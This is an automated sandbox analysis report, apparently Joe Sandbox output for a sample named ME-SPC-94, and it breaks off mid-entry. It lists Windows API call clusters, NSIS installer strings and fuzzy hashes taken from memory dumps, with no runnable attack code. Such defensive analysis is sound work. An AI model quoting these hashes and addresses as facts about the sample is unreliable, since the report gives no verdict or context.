                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                  • String ID: 9
                                                  • API String ID: 1149667376-2366072709
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                  • String ID:
                                                  • API String ID: 3294113728-0
                                                  APIs
                                                  • lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                  • lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                  • lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                  • SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  APIs
                                                  • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                  • GetTickCount.KERNEL32 ref: 00402D53
                                                  • wsprintfW.USER32 ref: 00402D81
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                    • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                    • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                    • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,00000064,?), ref: 00402D13
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                  • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                  • Opcode Fuzzy Hash: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                  • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                  • GetMessagePos.USER32 ref: 00404ADF
                                                  • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                  • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                  • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                  • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                  APIs
                                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C9D
                                                  • wsprintfW.USER32 ref: 00402CD1
                                                  • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                  • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
                                                  • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                  • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                  APIs
                                                  • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                  • wsprintfW.USER32 ref: 00404A70
                                                  • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$&B
                                                  • API String ID: 3540041739-2907463167
                                                  • Opcode ID: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                  • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                  • Opcode Fuzzy Hash: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                  • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 0040623F
                                                  • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                  • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 00406253
                                                  • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 00406266
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: *?|<>/":
                                                  • API String ID: 589700163-165019052
                                                  • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                  • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                  • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                  • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 0040252F
                                                  • lstrlenA.KERNEL32(00409D98,?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 00402536
                                                  • WriteFile.KERNEL32(00000000,?,00409D98,00000000,?,?,00000000,00000011), ref: 00402568
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritelstrlen
                                                  • String ID: 8
                                                  • API String ID: 1453599865-4194326291
                                                  • Opcode ID: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
                                                  • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                  • Opcode Fuzzy Hash: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
                                                  • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000,00409598,00435000,?,?,00000031), ref: 00401793
                                                  • CompareFileTime.KERNEL32(-00000014,?,00409598,00409598,00000000,00000000,00409598,00435000,?,?,00000031), ref: 004017B8
                                                    • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                    • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                    • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID:
                                                  • API String ID: 1941528284-0
                                                  • Opcode ID: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
                                                  • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                                  • Opcode Fuzzy Hash: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
                                                  • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Close$DeleteEnumOpen
                                                  • String ID:
                                                  • API String ID: 1912718029-0
                                                  • Opcode ID: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
                                                  • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                                  • Opcode Fuzzy Hash: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
                                                  • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                  • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                  • DeleteObject.GDI32(00000000), ref: 00401D36
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                  • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                  • Opcode Fuzzy Hash: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                  • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401D44
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                  • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  • Opcode ID: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
                                                  • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                  • Opcode Fuzzy Hash: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
                                                  • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                  • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                  • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                  • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00403192
                                                    • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                  • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                  • WriteFile.KERNEL32(0040BE90,?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$CountTickWrite
                                                  • String ID:
                                                  • API String ID: 2146148272-0
                                                  • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                  • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                                  • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                  • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC
                                                  APIs
                                                  • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                  • lstrlenW.KERNEL32(0040A598,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                  • RegCloseKey.ADVAPI32(?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateValuelstrlen
                                                  • String ID:
                                                  • API String ID: 1356686001-0
                                                  • Opcode ID: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                  • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                                  • Opcode Fuzzy Hash: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                  • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29
                                                  APIs
                                                    • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,00436800,?,771B2EE0,004057F0,?,00436800,771B2EE0,00434000), ref: 00405A4C
                                                    • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                    • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                  • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                  • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                  • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                  • String ID:
                                                  • API String ID: 3751793516-0
                                                  • Opcode ID: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
                                                  • Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
